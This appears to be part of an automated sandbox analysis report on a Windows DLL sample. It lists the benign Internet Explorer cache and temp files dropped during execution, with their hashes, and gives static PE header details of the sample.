                          IE Cache URL:res://ieframe.dll/down.png
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4720
                          Entropy (8bit):5.164796203267696
                          Encrypted:false
                          SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                          MD5:D65EC06F21C379C87040B83CC1ABAC6B
                          SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                          SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                          SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                          Malicious:false
                          Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):12105
                          Entropy (8bit):5.451485481468043
                          Encrypted:false
                          SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                          MD5:9234071287E637F85D721463C488704C
                          SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                          SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                          SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                          Malicious:false
                          Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\NewErrorPageTemplate[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1612
                          Entropy (8bit):4.869554560514657
                          Encrypted:false
                          SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                          MD5:DFEABDE84792228093A5A270352395B6
                          SHA1:E41258C9576721025926326F76063C2305586F76
                          SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                          SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                          Malicious:false
                          Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dnserror[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):2997
                          Entropy (8bit):4.4885437940628465
                          Encrypted:false
                          SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                          MD5:2DC61EB461DA1436F5D22BCE51425660
                          SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                          SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                          SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                          Malicious:false
                          IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
                          Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4720
                          Entropy (8bit):5.164796203267696
                          Encrypted:false
                          SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                          MD5:D65EC06F21C379C87040B83CC1ABAC6B
                          SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                          SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                          SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                          Malicious:false
                          Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):12105
                          Entropy (8bit):5.451485481468043
                          Encrypted:false
                          SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                          MD5:9234071287E637F85D721463C488704C
                          SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                          SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                          SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                          Malicious:false
                          IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                          Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):748
                          Entropy (8bit):7.249606135668305
                          Encrypted:false
                          SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                          MD5:C4F558C4C8B56858F15C09037CD6625A
                          SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                          SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                          SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):12105
                          Entropy (8bit):5.451485481468043
                          Encrypted:false
                          SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                          MD5:9234071287E637F85D721463C488704C
                          SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                          SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                          SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                          Malicious:false
                          Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1612
                          Entropy (8bit):4.869554560514657
                          Encrypted:false
                          SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                          MD5:DFEABDE84792228093A5A270352395B6
                          SHA1:E41258C9576721025926326F76063C2305586F76
                          SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                          SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                          Malicious:false
                          Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):2997
                          Entropy (8bit):4.4885437940628465
                          Encrypted:false
                          SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                          MD5:2DC61EB461DA1436F5D22BCE51425660
                          SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                          SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                          SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                          Malicious:false
                          IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
                          Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):748
                          Entropy (8bit):7.249606135668305
                          Encrypted:false
                          SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                          MD5:C4F558C4C8B56858F15C09037CD6625A
                          SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                          SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                          SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                          Malicious:false
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\errorPageStrings[1]
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:downloaded
                          Size (bytes):4720
                          Entropy (8bit):5.164796203267696
                          Encrypted:false
                          SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                          MD5:D65EC06F21C379C87040B83CC1ABAC6B
                          SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                          SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                          SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                          Malicious:false
                          IE Cache URL:res://ieframe.dll/errorPageStrings.js
                          Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                          C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):89
                          Entropy (8bit):4.204799341770279
                          Encrypted:false
                          SSDEEP:3:oVXUJUdUGZVoIRAW8JOGXnEJUdUGZVomn:o9UJUdXVj9qEJUdXVx
                          MD5:219D523BEF62B21E8758584711A71C9D
                          SHA1:75AB1ED37C50BDDC84628BB1C1FE774D4510A5D4
                          SHA-256:539ABC6B5B6970CDBDB99E3C3BF99CFB44A665FA53A6E1F507034C7360E1ECA1
                          SHA-512:72ACE9A8209E656A68C68F8AE70BAF6AA2EA49D8A5DD762CCCACCA99CA4E8E1AF1078360F74FB59DCB76DAD98645C92CE168EEA0C2F1371C66C46871C3A207F5
                          Malicious:false
                          Preview: [2021/01/12 18:11:50.302] Latest deploy version: ..[2021/01/12 18:11:50.302] 11.211.2 ..
                          C:\Users\user\AppData\Local\Temp\~DF3766C4D38666A50B.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):39601
                          Entropy (8bit):0.5623692941006625
                          Encrypted:false
                          SSDEEP:48:kBqoxKAuvScS+DdvmiIiuEltrzsEltrzcEltrz9:kBqoxKAuvScS+Ddvmtn+u+e+X
                          MD5:0ABA3E912A00FF12C9BCD751E552C6AC
                          SHA1:604B72B119AC4FCC60CC6B78DD06E47674960F59
                          SHA-256:C389DC44808E3643271BF35C29D43D49870678575B4A72B7B08F0200DBB1BF91
                          SHA-512:D0FAE570D7200680054EA49B47DEE6F5B41B64BF7D6B33757D7C3279ACB7D0B09086B77C9BBC1F1B934C2B2B744B62EE3AFA3D040F6453C0EB72DFC9003F5DE0
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DF3E209F7CF6B4A35B.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):39649
                          Entropy (8bit):0.5716084686167021
                          Encrypted:false
                          SSDEEP:48:kBqoxKAuvScS+FrJ40I0W6LEVlMqXU4E6LEVlMqXU4M6LEVlMqXU49:kBqoxKAuvScS+FrJ4b5pUFpUJpUO
                          MD5:FE4D1D2970B77EDB4C11B5D7FEA12FF8
                          SHA1:D564043E854466041B7E0F91012C1DBEFB1E995B
                          SHA-256:6AF2FEABAA89E67042A1849F9330DF90913C7243439BE76DEF0C11AC4EFF4BEF
                          SHA-512:30C625208CCE2991710390169D601E835AB22BCCA2BA073F67D7D43783A3573C9B7177F1D46E56A1D0FA689ACB894682139D9A41BFB40904BD49425410621F7F
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DF54395E81EA74D2E8.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):39633
                          Entropy (8bit):0.5716412962748327
                          Encrypted:false
                          SSDEEP:96:kBqoxKAuvScS+kCo5i8FWs0APcFWs0APcFWs0AP9:kBqoxKAuqR+kCo5i8FWNfFWNzFWNY
                          MD5:225491E9A52660D327EE010F0FFD7070
                          SHA1:6A72F7C91D51326EAED6D42BA5CB3E0716DD71B6
                          SHA-256:9B683729BC13A1D0180F367471738346BDEAD8BB0D9D6DA99846A0117C3B0549
                          SHA-512:40C2FE2A98C2C38D1E22E7CE2A0124341FD7BD96D9D03F56665BE1D969239BB6626F2D98A64FE8E01ED269F0DA0940113BBF1246EAB40CF0B2ED6E56F7D6A22F
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DFB7C0716C27FE0C9F.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):39617
                          Entropy (8bit):0.5681913439869308
                          Encrypted:false
                          SSDEEP:48:kBqoxKAuvScS+WQKjfIfGZSL7OxoJ2MZSL7OxoJ2kZSL7OxoJ2V:kBqoxKAuvScS+WQKjQOEOYfEOYLEOYw
                          MD5:B891791FD5F7FB01AE66573925AEC2BD
                          SHA1:7FC95E18909E2ACFA2E3F8846074B2D85A83997E
                          SHA-256:9AFD033C6F2B0DA935BAC11CEC48F845491380EF821B590A464FA41EC0D7EA02
                          SHA-512:7ABE34AFDA73FB224B5D834CABB9DEF20F24B339FE40A9872C90F28CD0ADDCAA5D3F1350AE993FA9B53206BB0420F9E35AD9C6B53A24388028F034A1A2B3ECEB
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DFBD53854F4C7AA5DC.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):12933
                          Entropy (8bit):0.4113805245720888
                          Encrypted:false
                          SSDEEP:24:c9lLh9lLh9lIn9lIn9loIF9low9lWZcp8:kBqoIb9Zcp8
                          MD5:08F7E35DD0191E808397C6753BA9350B
                          SHA1:002F9021DFA2DB2B1FDBC98BBF0D410B8D325E98
                          SHA-256:45B116C944E6C20D9B4BB7FBAA70E1DCC5F67AFB5797F3F9A90C29BA407821A6
                          SHA-512:2A8C7ABECB23235B0C78A2EFF5F1EEB1189DEA99803243E8126B5B011D1A483E2E1E41431B0D2F5AA7F65CD9AE05504C9E07A34432F0C49786F59B7B8A9FA319
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DFD091490AA9F67B44.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):12933
                          Entropy (8bit):0.41009752640370745
                          Encrypted:false
                          SSDEEP:24:c9lLh9lLh9lIn9lIn9loJF9loL9lWukVEtcF:kBqoIsyukVEtcF
                          MD5:F5DB7463CA435FA62E7BB0639988AA73
                          SHA1:0731532F2086815F0150B6D2E0250621198387AF
                          SHA-256:85A8380F1BB105DC216E3C58474DB7CDD30E1BE47C8B465AD0F63A47BF86C037
                          SHA-512:353CEF0DCB0F67895F4C6E1B06D91D365098EB0CAFBCE919CF0CFCDF3DADEE8ED06D78F5A556AFAEF429487E70069D6433BE13C250122EBD54D2EC4DC9B1F43A
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):12933
                          Entropy (8bit):0.4122061728840318
                          Encrypted:false
                          SSDEEP:24:c9lLh9lLh9lIn9lIn9lojF9lop9lWszhQcQ:kBqoIyssNQcQ
                          MD5:1DE5EDAF14E2164927A5AFB0414A7429
                          SHA1:66F0984B05D3605DC986A9627E259894165AD2D9
                          SHA-256:DA384F89996B303CDB54D07F4EC8CAD7F4C358248141D52FB85EBB3B713D7DB7
                          SHA-512:040D7A1DC989476B303C55AA237B0D27219C4009B23A65DAE16111424CC67FDA8B30D1103816E6F39F59AADF4ECD167F8BB61DAF1E25C80E57879DD377F62977
                          Malicious:false
                          C:\Users\user\AppData\Local\Temp\~DFEB82DA7A2E1DEEA8.TMP
                          Process:C:\Program Files\internet explorer\iexplore.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):12933
                          Entropy (8bit):0.4119123300741825
                          Encrypted:false
                          SSDEEP:24:c9lLh9lLh9lIn9lIn9loFF9lof9lWGSCwV:kBqoIAeGZwV
                          MD5:4123E0366D9F6C943DED85A49D8D3883
                          SHA1:29ABF3A5CDFBD1EA6903364773994B6CCC64B230
                          SHA-256:47DDC5051E14E787662AA9D73359FA00A877EECFB0A9E86D23CC3BBB8B8F60B1
                          SHA-512:1E4E7308DEC36050041B2073727387767B3911038DB574DF0F4169DFC31764CC83F8B68D0C10F7B56CE8E543632032E7CE884DAF37952205A218D597AD06E800
                          Malicious:false

                          Static File Info

                          General

                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):4.5579670901819425
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 98.12%
                          • Windows Screen Saver (13104/52) 1.28%
                          • Win16/32 Executable Delphi generic (2074/23) 0.20%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          File name:zQ32b1FVcL.dll
                          File size:365400
                          MD5:eed4174c8a96dd7b611d9f109c71e20f
                          SHA1:c471724d86fd269a19932280361ca52e1e294f19
                          SHA256:e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
                          SHA512:3c73f6b30b28afbb601473eba9100a798e1a5234ec4fe968a7b6fc0119c623633ecd8ab195a1355b96cc0d121f2c52b0235987304a84e2cb212e56714a63223c
                          SSDEEP:3072:Y/citbV4XnbWnfPAQXKSaJtoE7fWtzS3gI6nZVzwqUlre:IHtbyinfPAQ6SaJtoOoxzwqWre
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~._...........!...2.2...H......@(.......P.......................................$.....................................

                          File Icon

                          Icon Hash:90e4ac90fc3c2480

                          Static PE Info

                          General

                          Entrypoint:0x10032840
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x10000000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                          DLL Characteristics:
                          Time Stamp:0x5FFD7E17 [Tue Jan 12 10:46:47 2021 UTC]
